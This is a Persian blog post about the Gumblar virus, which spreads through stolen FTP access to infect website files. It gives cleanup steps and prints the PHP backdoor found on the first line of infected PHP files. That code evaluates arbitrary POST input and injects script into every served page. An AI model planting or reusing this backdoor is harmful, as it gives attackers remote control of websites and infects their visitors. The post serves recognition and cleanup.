این ویروس مخوف به دو صورت عمل می کنهگامبلار نام ویروسی است که در این چند وقت اخیر بلای جان سایت ها شده است و موتور جستجو گر گوگل را به زحمت انداخته تا زیر آدرس سایت هایی که گامبلار به آنها نفوذ کرده است این جمله را درج نماید ” این وبگاه ممکن است به رایانه شما آسیب برساند. “
اما چگونه گامبلار نفوذ میکیند ؟
وقتی ویروس گامبلار به رایانه شما نفوذ میکیند، شما هر زمانی ftp مربوط به سایتی رو بازکنید، فایل هایی که بر روی ftp وجود دارند بلافاصله ویروسی می شوند. وقتی گوگل برای اندکس صفحات، به سایت شما سر میزند، کاری ندارد که شما بدون آنکه خودتان بخواهید ویروسی شده اید. بنابراین تنها کاری که میکند جمله ” این وبگاه ممکن است به رایانه شما آسیب برساند ” را در زیر آدرس سایت شما درج میکند. تمام رتبه هایی که سایت شما از موتور جستجوگر گوگل گرفته بود، حذف خواهد شد بدین صورتی که اگر در موتور جستجوگر گوگل، شما در صفحات ابتدایی بودید، حال دیگر در صفحات هزارم هم خبری از سایت شما نیست
این ویروس صفحات وب شما را آلوده کرده و کدی شبیه به کد زیر فایل های (.html, .php, .js, etc.) را در برمیگیرد.
بیشتر سایت هایی که به این ویروس آلوده شدن گزارش دادند که کدی شبیه به کد زیر در خط ابتدایی فایل های PHP قرار میگیرند.
<?php if(!function_exists(’tmp_lkojfghx’)){if(isset($_POST['tmp_lkojfghx3']))
eval($_POST['tmp_lkojfghx3']);if(!defined(’TMP_XHGFJOKL’))
define(’TMP_XHGFJOKL’,base64_decode=’));
function tmp_lkojfghx($s){ if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));
if(preg_match_all(’#<script(.*?)</script>#is’,$s,$a))
foreach($a[0] as $v) if(count(explode(”\n”,$v))>5){
$e=preg_match(’#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#’,$v) || preg_match(’#[\(\[](\s*\d+,)20,}#’,$v);
if((preg_match(’#\beval\b#’,$v)&&($e||strpos($v,’fromCharCode’)))||($e&&strpos;($v,’[removed]‘)))$s=str_replace($v,”,$s);}
$s1=preg_replace(’#<script language=javascript><!– \ndocument\.write\(unescape\(.+?\n –></script>#’,”,$s);
if(stristr($s,’<body’)) $s=preg_replace(’#(\s*<body)#mi’,TMP_XHGFJOKL.’\۱′,$s1);elseif(($s1!=$s)||stristr($s,’</body’)||stristr($s,’</title>’))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])==’tmp_lkojfghx’)return;else $s[]=array($a==’default output handler’?false:$a);
for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(’tmp_lkojfghx’);for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}
if(($a=@set_error_handler(’tmp_lkojfghx2′))!=’tmp_lkojfghx2′)
$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2();
?>
اما در پست وبلاگ AbelCheng.com گزارش داده که منتشر کننده این ویروس با بدست آوردن نام کاربری و رمز عبور ftp اقدام به هک وبلاگ مربوطه کرده است. ( نویسنده این وبلاگ گفته است وقتی علت هک وبلاگ خود را بررسی کردن نمونه کد بالا در ابتدا ( خط اول ) فایل PHP وجود داشته است.
چگونه از شر گامبلار خلاص شویم ؟
شما باید در اولین مرحله از رایانه خودتان شروع کنید ( من پیشنهاد میکنم که مطمئن ترین راه رو انتخاب کنید یعنی یک بار سیستم عاملی که بر روی رایانتون نصب هست را پاک کنید و دوباره آن را نصب کنید البته اگر این تعویض سیستم عامل با فرمت کردن درایو های رایانه ی شما همراه باشه خیلی مطمئن تر و دقیق تر خواهد بود )
اما افراد زیادی بدون تعویض سیستم عامل و با استفاده ازMalwarebytes توانستن، این کار را با موفقیت انجام بدهند
( گزارش ها این رو اثبات میکنه )
در مرحله دوم بعد از این که رایانه ی خودتون رو با استفاده از ۲ روش فوق پاکسازی کردید باید پسورد ( رمز عبور ) ftp را عوض کنید.
و سرانجام شما باید فایل های PHP را پاکسازی کنید ( به شما پیشنهاد می کنم، اگر فایل های خام و پاک برنامه ی مدیریت محتوایی که روی سایتتون نصبه و یا فایل های خام و پاک (.html, .php, .js, etc.) اگر در رایانه خودتون دارید به جای پاکسازی فایل ها، انها را در هاست جایگزین نمایید. ) البته مراقب باشید که این فایلها قبلا در رایانه شما ویورسی نشده باشد.
من اسکریپ بالا را در فایل index.php قالب دو تا از سایت ها پیدا کردم. اما نباید فقط محدود به پیدا کردن تنها این کد باشیم ( پیشنهاد می کنم برای اطمینان بیش تر تمام فایل های (.html, .php, .js, etc.) رو جایگزین و پاکسازی کنید.
در اخر باید منتظر گوگل باشید تا دوباره به سایت شما سر بزنه و جمله ” این وبگاه ممکن است به رایانه شما آسیب برساند ” را حذف نماید.
در این رابطه بیشتر بخوانید :
